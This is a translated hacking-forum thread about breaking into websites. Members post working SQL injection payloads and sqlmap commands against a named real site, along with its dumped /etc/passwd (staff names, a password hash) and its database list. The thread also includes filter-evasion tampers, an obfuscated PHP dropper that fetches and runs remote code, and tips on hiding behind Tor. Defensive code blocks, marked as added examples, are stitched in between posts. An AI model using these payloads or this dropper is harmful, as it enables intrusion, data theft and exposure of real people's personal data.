Your questions about vulnerabilities.

Discussion in 'Vulnerabilities' started by +, 27 Apr 2015.

  1. karkajoi

    Good evening.
    How do I limit the number of rows returned in a query like this?
    Code:
    (select (@x) from (select (@x:=0x00),(select (0) from (user)where (0x00) in (@x:=concat(@x,0x3c62723e,login,0x3a,password))))x)
    
    When the database is large, the site falls over when you try to output the whole contents of the table.
     
    Sensoft likes this.
  2. karkajoi

    Code:
    (select@ from(select@:=0x00,(select 1 from(select*from user order by userid ASC limit 0,100)w where(@:=concat(@,0x3c62723e,login,0x3a,password))))q)
    
    Asked it myself, answered it myself. Sweet.
    Maybe it'll come in handy for someone.
     
    #2462 karkajoi, 28 Sep 2018
    Last edited: 1 Oct 2018
    man474019 likes this.
  3. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,461
    Likes Received:
    398
    Reputations:
    228
  4. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    241
    Likes Received:
    65
    Reputations:
    1
  5. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,461
    Likes Received:
    398
    Reputations:
    228
    Naturally, since there is no such page
    Code:
    WHERE (link_oldlinks.url='forschung.htmladsadsa' OR link_oldlinks.url='forschung.htmladsadsa/')
    The only thing that puzzles me is
    Code:
    Table 'crossroads_asia.link_oldlinks' doesn't exist
     
  6. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    444
    Likes Received:
    80
    Reputations:
    20
    What's the most you can get out of an injection into style="here"? '<>... are allowed, but no " ?
    Code:
    <a href="site.md" target="_blank" style=" ">XSS</a>
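
The defensive side of the question above, as an added example that is not from the thread: a value that ends up inside a style="..." attribute needs two layers of output encoding, because HTML attribute escaping alone (which is what blocks the " here) still leaves ' ( ) : ; available to start a new declaration or a url() call. The helpers css_escape, encode_for_style_attr, render_link and is_inert are hypothetical names written for this example; the anchor markup is the one quoted in the post.

```python
# Added example, not from the thread: output encoding for an untrusted value
# that lands inside a style="..." attribute. Attribute quoting alone is not
# enough; the CSS layer needs its own escaping so the value cannot start a
# new declaration or a url() call.
import html


def css_escape(value: str) -> str:
    """Escape every character except ASCII letters and digits as \\XXXXXX.

    Six hex digits is the longest CSS escape form, so no terminating space
    is needed and the character that follows can never be swallowed.
    Hypothetical helper written for this example.
    """
    return "".join(
        ch if ch.isascii() and ch.isalnum() else "\\%06x" % ord(ch)
        for ch in value
    )


def encode_for_style_attr(value: str) -> str:
    """CSS-escape first, then HTML-attribute-escape the result."""
    return html.escape(css_escape(value), quote=True)


def render_link(href: str, color: str) -> str:
    """Rebuild the anchor from the thread with an untrusted colour in style."""
    return '<a href="%s" target="_blank" style="color:%s">XSS</a>' % (
        html.escape(href, quote=True),
        encode_for_style_attr(color),
    )


def is_inert(encoded: str) -> bool:
    """True when only letters, digits and CSS escape sequences survived."""
    return all(c.isalnum() or c == "\\" for c in encoded)


if __name__ == "__main__":
    # Constructed inputs: a legitimate colour and a value that tries to add
    # a second declaration with only the characters the post says survive.
    for value in ("red", "red;background:url('x')"):
        print(render_link("site.md", value))
```

Encoded this way, `red;background:url('x')` reaches the browser as one identifier that is an invalid colour, so the declaration is dropped instead of being parsed as two declarations; the browser only ever decodes the escapes as part of that token.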
     
  7. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    47
    Likes Received:
    11
    Reputations:
    11
    Hi all, I found a vulnerable site, but the trouble is I can't get the injection to work either by hand or with sqlmap. Anyone here willing to help?
    Code:
    http://www.mscnano.eu/news.php?id=132
     
  8. ms13

    ms13 Level 8

    Joined:
    19 Jun 2015
    Messages:
    2,126
    Likes Received:
    9,187
    Reputations:
    110
    For example, like this
    Code:
    http://www.mscnano.eu/news.php?id=z%27%20or%20mid(version(),1,1)=5%20and%20%272%27=%272
    and in fact it's union-based there
    Code:
    http://www.mscnano.eu/news.php?id=z%27%20union%20select%201,2,3,@@version,5,6,user(),8--%20-
    and so on
    Code:
    http://www.mscnano.eu/news.php?id=z%27%20union%20select%201,2,3,load_file(%27/etc/passwd%27),5,6,7,8--%20-
    root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false messagebus:x:102:107::/var/run/dbus:/bin/false avahi-autoipd:x:103:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false avahi:x:104:111:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false couchdb:x:105:113:CouchDB Administrator,,,:/var/lib/couchdb:/bin/bash speech-dispatcher:x:106:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh usbmux:x:107:46:usbmux daemon,,,:/home/usbmux:/bin/false haldaemon:x:108:114:Hardware abstraction layer,,,:/var/run/hald:/bin/false kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false pulse:x:110:115:pulseAudio daemon,,,:/var/run/pulse:/bin/false rtkit:x:111:117:RealtimeKit,,,:/proc:/bin/false saned:x:112:118::/home/saned:/bin/false hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false gdm:x:114:120:Gnome Display Manager:/var/lib/gdm:/bin/false txomin:x:1000:1000:txomin,,,:/home/txomin:/bin/bash sshd:x:115:65534::/var/run/sshd:/usr/sbin/nologin dipc:x:504:100:Donostia International Physics Center:/home/dipc:/bin/csh csic:x:505:100:Unidad de Fisica de Materiales:/home/csic:/bin/bash arubio:x:506:100:Angel Rubio:/home/arubio:/bin/bash ortega:x:507:100:Enrique Ortega:/home/ortega:/bin/csh 
ricardo:x:508:100:Ricardo Diez Muino:/home/ricardo:/bin/bash group:x:509:100:Echenique's Group:/home/group:/bin/csh seminars:x:510:100:Seminars:/home/seminars:/bin/csh papers:x:511:100:papers:/home/papers:/bin/csh jgarcia:x:512:100:F. Javier Garcia de Abajo:/home/jgarcia:/bin/csh Echenique:x:513:100:pedro M. Echenique:/home/Echenique:/bin/csh aizpurua:x:517:517:Javier Aizpurua:/home/aizpurua:/bin/bash scsroast:x:518:100::/home/scsroast:/bin/csh inigo:x:529:100::/home/inigo:/bin/bash otzarreta:x:530:530::/home/otzarreta:/bin/bash gaudoin:x:532:532::/home/gaudoin:/bin/bash nanolab:x:533:533::/home/nanolab:/bin/bash nanotron:x:534:534::/home/nanotron:/bin/bash remi:x:535:535::/home/remi:/bin/bash digitalak:x:536:536::/home/digitalak:/bin/bash nano2006:x:537:537::/home/nano2006:/bin/bash aitzol:x:500:501:Aitzol Garcia Etxarri:/home/aitzol:/bin/bash waparpia:x:501:503:Andres Arnau:/home/waparpia:/bin/tcsh ftpdipc:x:538:538:Cuenta ftp:/home/ftpdipc:/bin/bash dedomulti:x:539:539::/home/dedomulti:/bin/bash eph2007:x:540:540::/home/eph2007:/bin/bash eltonjose:x:502:504:Elton Jose:/home/eltonjose:/bin/bash moodle:x:503:505:Usuario de moodle:/home/moodle:/bin/bash mscnano:x:523:506:Master Nanotecnologia:/home/mscnano:/bin/bash coronado:x:524:507:Alejandro Reyes Coronado:/home/coronado:/bin/bash mscnanointra:x:527:508::/home/mscnano/intranet:/bin/bash ssmeeting:x:543:509:ssmeeting:/home/ssmeeting:/bin/tcsh leskovsky:x:544:544::/home/leskovsky:/bin/bash einstein:x:545:545::/home/einstein:/bin/bash cerveny:x:514:502:Silvina Cerveny:/home/cerveny:/bin/bash schwartz:x:521:510:Gustavo Schwartz:/home/schwartz:/bin/bash frederiksen:x:526:511:Thomas Frederiksen:/home/frederiksen:/bin/bash webalianza:x:528:512::/home/webalianza:/bin/bash dipc10:x:541:513::/home/dipc10:/bin/bash eugene:x:542:514:Eugene Krasovskii:/home/eugene:/bin/bash metamorp:x:520:520::/home/metamorphose:/bin/bash spans:x:522:522::/home/spans:/bin/bash meeting:x:525:525::/home/meeting:/bin/bash 
Debian-exim:x:117:124::/var/spool/exim4:/bin/false mysql:x:116:123:MySQL Server,,,:/var/lib/mysql:/bin/false statd:x:118:65534::/var/lib/nfs:/bin/false nfo12:x:546:515:nfo12:/home/nfo12:/bin/bash mestizajes:x:547:516:Congreso Mestizajes:/home/mestizajes:/bin/bash ivo:x:548:519:Ivo Souza:/home/ivo:/bin/bash smmta:x:119:125:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false smmsp:x:120:126:Mail Submission Program,,,:/var/lib/sendmail:/bin/false ossec:x:1001:1001::/var/ossec:/bin/false gosalvez:x:1002:1002::/home/gosalvez:/bin/bash nanophotonics:x:1003:1003:Grupo Javi Aizpurua,,,:/home/nanophotonics:/bin/bash garcialekue:x:1004:1004:Arantzazu Garcia Lekue,,,:/home/garcialekue:/bin/bash rakovich:x:1005:1005:Yury Rakovich:/home/rakovich:/bin/bash mesoscopics:x:1006:1006:Sebastian Bergeret,,,:/home/csic/mesoscopics:/bin/bash mblanco:x:1007:1007::/home/mblanco:/bin/bash QMC:$6$AuxQZxPT$aO5/vg51vWluEfCSmZGogvkptiH3SSqMqvj0SBKu0mq0gNg/Fx4ALtpV4zkn5k5Ne8HcqmEmNZNrjC3RoxTNT/:1008:1008::/home/QMC:/bin/sh iisc21:x:1009:1009:Congreso iisc21,,,:/home/iisc21:/bin/bash TJC:x:1010:1010:Dario Bercioux:/home/TJC:/bin/bash giedke:x:1011:1011:Geza Giedke:/home/giedke:/bin/bash maiagv:x:1012:1012:Maia Garcia Vergniory:/home/maiagv:/bin/bash trmme:x:1013:1013:Congreso Thomas Frederiksen:/home/trmme:/bin/bash internships:x:1014:1014:Responsable Thomas Frederiksen:/home/internships:/bin/bash fbarroso:x:1015:1015:Fabienne Barroso:/home/fbarroso:/bin/bash lsalassa:x:1016:1016:Luca Salassa:/home/lsalassa:/bin/bash tms17:x:1017:1017:Congreso tms17:/home/tms17:/bin/bash ecscd13:x:1018:1018:Confreso ecscd13:/home/ecscd13:/bin/bash magnon:x:1019:1019:Congreso magnon:/home/magnon:/bin/bash mole:x:1020:1020:Grupo Juanjo Saenz:/home/mole:/bin/bash nanoelectronics:x:1021:1021:Grupo Thomas Frederiksen:/home/nanoelectronics:/bin/bash nicolas:x:1022:1022::/home/dipc-courses:/bin/bash bondslam:x:1023:1023:Eduard Matito:/home/bondslam:/bin/bash colloquium:x:1024:1024:Web 
colloquium:/home/colloquium:/bin/bash tms:x:1025:1025:Congreso tms:/home/tms:/bin/bash qdp2018:x:1026:1026::/home/qdp2018:/bin/bash quantumdev:x:1027:1027::/home/quantumdev:/bin/bash daqm:x:1028:1028::/home/daqm:/bin/bash

    well, you can upload the shell yourselves))
     
    #2468 ms13, 6 Oct 2018
    Last edited: 6 Oct 2018
    lukeone and Pirnazar like this.
  9. lukeone

    lukeone Member

    Joined:
    7 May 2017
    Messages:
    6
    Likes Received:
    17
    Reputations:
    1
    Code:
    python sqlmap.py -u "http://www.mscnano.eu/news.php?id=" --random-agent --hex --threads 1 --dbs --batch --dbms=mysql --technique=U --level 5 --risk 3 --tamper=space2comment,unmagicquotes,escapequotes,versionedkeywords
    
    ---
    Parameter: id (GET)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: id=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178627871,0x775a5551695146647647515859656e61626e6367654643487767764f4e56695a726557454457534a,0x71626b6271),NULL#
    ---

    available databases [64]:
    [*] #mysql50#mysql.old.copia
    [*] 2dspm
    [*] 3s19
    [*] bondslam
    [*] cc
    [*] cees
    [*] cen2018
    [*] computing_resources
    [*] daqm
    [*] dipc
    [*] dipc-courses
    [*] dipc10
    [*] dynapeutics
    [*] e2epol
    [*] eezz18
    [*] etsf
    [*] iegr
    [*] ii
    [*] inelastica
    [*] information_schema
    [*] interfaces2014
    [*] lankor_topa14
    [*] leskovsky
    [*] limage2018
    [*] magnon
    [*] modsurf
    [*] mysql
    [*] n2d
    [*] nanoqi
    [*] nanoqi16
    [*] nanoqi17
    [*] ngsces2018
    [*] oss
    [*] oss18
    [*] pecas
    [*] pecas2019
    [*] pedro
    [*] phpmyadmin
    [*] polymorphs
    [*] prueba
    [*] qdp2018
    [*] quantumchemphys
    [*] quantumdev
    [*] sabat2018
    [*] scom16
    [*] siqew2019
    [*] sos2
    [*] sos22
    [*] test
    [*] theobio17
    [*] tms17
    [*] tmspin
    [*] topadipc
    [*] topadipc2012
    [*] topadipc2014
    [*] topadipc2015
    [*] topadipc2017
    [*] topadipc2018
    [*] topadipcOLD
    [*] topostates
    [*] totalenergy2020
    [*] tstutorial
    [*] webcc
    [*] wikidb

    The whole point is that there's some kind of filter there that drops the connection on "suspicious requests"; the tampers in sqlmap get through anyway)
     
    Pirnazar and Sola666 like this.
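
The filter lukeone describes is the detection side of the last three posts, and the reason the named tampers get past it is usually that it matches raw request text. As an added example that is not from the thread or from sqlmap, here is a small detector that normalizes each query parameter (URL decoding, comment stripping, whitespace collapsing) before matching. The log lines are constructed in Common Log Format; the query strings on the second and third lines are the two probes quoted above, the fourth is a constructed variant with spaces replaced by /**/ comments, and the function and signature names are assumptions made for this example.

```python
# Added example, not from the thread: normalize request parameters before
# matching, so comment-stuffed or URL-encoded probes still surface.
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed Common Log Format lines (IPs from documentation ranges).
SAMPLE_LOG = r"""
203.0.113.7 - - [06/Oct/2018:12:00:01 +0000] "GET /news.php?id=132 HTTP/1.1" 200 5120
203.0.113.7 - - [06/Oct/2018:12:00:05 +0000] "GET /news.php?id=z%27%20or%20mid(version(),1,1)=5%20and%20%272%27=%272 HTTP/1.1" 200 5120
203.0.113.7 - - [06/Oct/2018:12:00:09 +0000] "GET /news.php?id=z%27%20union%20select%201,2,3,@@version,5,6,user(),8--%20- HTTP/1.1" 200 6012
203.0.113.7 - - [06/Oct/2018:12:00:13 +0000] "GET /news.php?id=z%27/**/union/**/select/**/1,2,3,load_file(%27/etc/passwd%27),5,6,7,8--%20- HTTP/1.1" 200 9100
198.51.100.4 - - [06/Oct/2018:12:01:00 +0000] "GET /news.php?id=133&lang=en HTTP/1.1" 200 4980
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Patterns are applied to the normalized value, never to the raw one.
SIGNATURES = [
    ("union_select", re.compile(r"\bunion\b.{0,40}\bselect\b")),
    ("file_read", re.compile(r"\bload_file\s*\(")),
    ("fingerprint", re.compile(r"@@version|\bversion\s*\(")),
    ("quote_probe", re.compile(r"'\s*(?:or|and)\b")),
]


def normalize(value: str) -> str:
    """Decode and strip the disguises, then collapse whitespace and lowercase."""
    for _ in range(2):                         # second pass catches %25-style double encoding
        value = unquote_plus(value)
    value = re.sub(r"/\*!\d*", " ", value)     # MySQL versioned comment opener /*!NNNNN
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)   # plain /* ... */ comments
    value = value.replace("*/", " ")           # closer left behind by the versioned form
    return re.sub(r"\s+", " ", value).strip().lower()


def scan_line(line: str):
    """Parse one log line and return its hits, or None if it is not CLF."""
    m = LOG_RE.match(line)
    if not m:
        return None
    hits = []
    for name, raw in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        norm = normalize(raw)
        hits.extend((name, sig) for sig, rx in SIGNATURES if rx.search(norm))
    return {"ip": m["ip"], "target": m["target"], "status": m["status"], "hits": hits}


def scan_log(text: str):
    """Scan every non-empty line; records with an empty hits list are clean."""
    return [r for r in (scan_line(l) for l in text.splitlines() if l.strip()) if r]


if __name__ == "__main__":
    for record in scan_log(SAMPLE_LOG):
        if record["hits"]:
            print(record["ip"], record["target"], record["hits"])
```

The signatures are deliberately few; the point is that the /**/-stuffed request on the fourth line produces exactly the same normalized string as a plain `union select`, so one pattern covers both, and a filter that matched raw text would have seen only the first two probes.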
  10. jakonda1001

    jakonda1001 Member

    Joined:
    17 Mar 2016
    Messages:
    178
    Likes Received:
    5
    Reputations:
    0
    How do you get a shell up through this?
    Code:
    <?php
    @ini_set('display_errors', '0');
    error_reporting(0);
    if (!$npDcheckClassBgp) {
    $ea = '_shaesx_'; $ay = 'get_data_ya'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'default'; $pass = "Zgc5c4MXrLUocQYT5ZtHJf/cM1fWdrpdmmSLH6uToRkH";
    if (ini_get('allow_url_fopen')) {
    function get_data_ya($url) {
    $data = file_get_contents($url);
    return $data;
    }
    }
    else {
    function get_data_ya($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8);
    $data = curl_exec($ch);
    curl_close($ch);
    return $data;
    }
    }
    function wp_cd($fd, $fa="")
    {
    $fe = "wp_frmfunct";
    $len = strlen($fd);
    $ff = '';
    $n = $len>100 ? 8 : 2;
    while( strlen($ff)<$len )
    {
    $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n);
    }
    return $fd^$ff;
    }
    $reqw = $ay($ao($oa("$pass"), 'wp_function'));
    preg_match('#gogo(.*)enen#is', $reqw, $mtchs);
    $dirs = glob("*", GLOB_ONLYDIR);
    foreach ($dirs as $dira) {
    if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; }
    $subdirs = glob("$dira/*", GLOB_ONLYDIR);
    foreach ($subdirs as $subdira) {
    if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; }
    }
    }
    if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); }
    fwrite($hdl, "<?php\n$mtchs[1]\n?>");
    fclose($hdl);
    include("{$eb}.$algo");
    unlink("{$eb}.$algo");
    $npDcheckClassBgp = 'aue';
    }
     
  11. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    493
    Likes Received:
    865
    Reputations:
    312
    It pulls down, saves and includes this script: http://linksferma.com/lnk/inj.php. It's clearer there what's going on.
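
For anyone who finds a file like the one in the previous post on their own host, the useful question is how to spot the pattern crlf describes (fetch remote code, write it to a hidden file, include it, delete it) across a whole web root. As an added example that is not from the thread or from any real scanner, here is a heuristic triage script: each indicator on its own is common in legitimate PHP, so a file is only flagged when several co-occur. The indicator names, the threshold and both PHP samples are constructed for this example; the suspect sample is a hollow stand-in that fetches nothing and only reproduces the shapes the scanner looks for.

```python
# Added example, not from the thread: heuristic triage for PHP files that
# follow the dropper pattern (fetch remote code, write it to a hidden file,
# include it, delete it). Hypothetical tool; samples constructed for this example.
import re

INDICATORS = [
    ("silences_errors",
     re.compile(r"error_reporting\s*\(\s*0\s*\)|display_errors[\"']\s*,\s*[\"']?0")),
    # a function name assembled from two variables, e.g. $dec = $a.$b;
    ("builds_function_name",
     re.compile(r"\$\w+\s*=\s*\$\w+\s*\.\s*\$\w+\s*;")),
    # nested variable-function calls, e.g. $get($dec(...))
    ("variable_function_call", re.compile(r"\$\w+\s*\(\s*\$\w+\s*\(")),
    ("remote_fetch", re.compile(r"file_get_contents\s*\(|curl_exec\s*\(")),
    # writing a string that starts with an opening PHP tag
    ("writes_php_source", re.compile(r"fwrite\s*\([^,]+,\s*[\"'].*<\?php")),
    ("include_then_unlink", re.compile(r"include\s*\(.*?\)\s*;\s*unlink\s*\(", re.S)),
    # fopen of a dot-prefixed file whose name is a variable
    ("hidden_dotfile", re.compile(r"fopen\s*\(\s*[\"'][^\"']*\.\$\w+")),
]

# Constructed stand-in with the same shapes as the posted file; it is not
# functional ($seed and $dir are never defined) and contacts nothing.
SUSPECT_PHP = r"""<?php
@ini_set('display_errors', '0');
error_reporting(0);
$a = 'base64'; $b = '_decode'; $dec = $a.$b; $get = 'fetch'; $name = 'default';
function fetch($url) { return file_get_contents($url); }
$body = $get($dec($seed));   // $seed is a constructed placeholder, not a real stage URL
$hdl = fopen("$dir/.$name", 'w');
fwrite($hdl, "<?php\n$body\n?>");
fclose($hdl);
include("$dir/.$name");
unlink("$dir/.$name");
"""

# Constructed ordinary application code: reads a config, appends to a log,
# includes a template. It hits exactly one indicator.
BENIGN_PHP = r"""<?php
$config = json_decode(file_get_contents(__DIR__ . '/config.json'), true);
$log = fopen('/var/log/app/app.log', 'a');
fwrite($log, date('c') . " request\n");
fclose($log);
include('templates/header.php');
"""


def indicators(src: str) -> list:
    """Names of every indicator whose pattern occurs in the source."""
    return [name for name, rx in INDICATORS if rx.search(src)]


def is_suspicious(src: str, threshold: int = 4) -> bool:
    """Flag when at least `threshold` of the indicators co-occur."""
    return len(indicators(src)) >= threshold


if __name__ == "__main__":
    for label, src in (("suspect", SUSPECT_PHP), ("benign", BENIGN_PHP)):
        print(label, is_suspicious(src), indicators(src))
```

Run it over every .php file under the document root (and over files with no .php extension, since the dropper writes to a dot-file) and review anything at or above the threshold by hand; the threshold is a starting point to tune against your own code base, not a verdict.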
     
  12. TPAXXTOP

    TPAXXTOP New Member

    Joined:
    12 Oct 2016
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    Guys, help me out: there's a site with a GET parameter, I added ' to the end and got this error, so I think there's a vulnerability
    You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near and status=1' at line 1
    1064
    but when I try to exploit it with sqlmap it returns the error "unable to connect to the target URL"
    I tried putting a proxy in, same trouble
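
The 1064 error in the post above is what a concatenated query looks like from the outside: the stray ' lands inside the SQL text and breaks the statement. As an added example that is not from the thread, here are the same lookup written the vulnerable way and the fixed way, side by side, so the fix can be checked rather than described. SQLite is used only so the example runs offline; the table, its rows and the function names are constructed for this example, and the error text differs from MariaDB's, but the behaviour (syntax error versus empty result) is the same with a MySQL/MariaDB driver using parameter binding.

```python
# Added example, not from the thread: the same "id" lookup written two ways.
# The vulnerable form pastes the request parameter into SQL text; the fixed
# form validates the type and binds the value as a parameter.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table standing in for a site's news table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, status INTEGER)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?, ?)",
        [(132, "Open day", 1), (133, "Seminar", 1), (134, "Draft", 0)],
    )
    return conn


def fetch_news_vulnerable(conn, raw_id: str):
    # String concatenation: whatever arrives in ?id= becomes part of the statement,
    # so a single quote in the input unbalances the literal and the parser fails.
    sql = "SELECT id, title FROM news WHERE id='" + raw_id + "' and status=1"
    return conn.execute(sql).fetchall()


def fetch_news_fixed(conn, raw_id: str):
    # 1. Validate the shape the application expects (an integer id).
    try:
        news_id = int(raw_id)
    except ValueError:
        return []          # treat as a bad request; the database never sees the junk
    # 2. Bind the value; the statement text is fixed and the driver handles quoting.
    return conn.execute(
        "SELECT id, title FROM news WHERE id = ? AND status = 1", (news_id,)
    ).fetchall()


def probe(raw_id: str) -> dict:
    """Run both variants on one input; each result is ('rows', list) or ('error', msg)."""
    conn = make_db()
    out = {}
    for name, fn in (("vulnerable", fetch_news_vulnerable), ("fixed", fetch_news_fixed)):
        try:
            out[name] = ("rows", fn(conn, raw_id))
        except sqlite3.Error as exc:
            out[name] = ("error", str(exc))
    return out


if __name__ == "__main__":
    # Constructed inputs: a normal id and the same id with a trailing quote.
    for value in ("132", "132'"):
        print(repr(value), probe(value))
```

The type check is not a substitute for binding: it is there so that obviously malformed input is rejected before any query runs, and binding is what guarantees that the value can never change the statement even when the expected type is free text.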
     
  13. ms13

    ms13 Level 8

    Joined:
    19 Jun 2015
    Messages:
    2,126
    Likes Received:
    9,187
    Reputations:
    110
    TPAXXTOP likes this.
  14. TPAXXTOP

    TPAXXTOP New Member

    Joined:
    12 Oct 2016
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
  15. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    221
    Likes Received:
    372
    Reputations:
    94
    Try working it out by hand first. Then, once you have a working injection in hand, use the appropriate tampers.
     
    ms13 and TPAXXTOP like this.
  16. TPAXXTOP

    TPAXXTOP New Member

    Joined:
    12 Oct 2016
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    well, the thing is I don't know how to do it by hand) tell me how to do it properly, or at least point me to some manual please)
     
  17. ms13

    ms13 Level 8

    Joined:
    19 Jun 2015
    Messages:
    2,126
    Likes Received:
    9,187
    Reputations:
    110
    TPAXXTOP likes this.
  18. ilia455

    ilia455 New Member

    Joined:
    7 Sep 2015
    Messages:
    6
    Likes Received:
    1
    Reputations:
    2
    google "css injection"
     
  19. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    226
    Likes Received:
    105
    Reputations:
    1
    run Tor, put --tor in sqlmap, or use a proxy
     
  20. matthhy
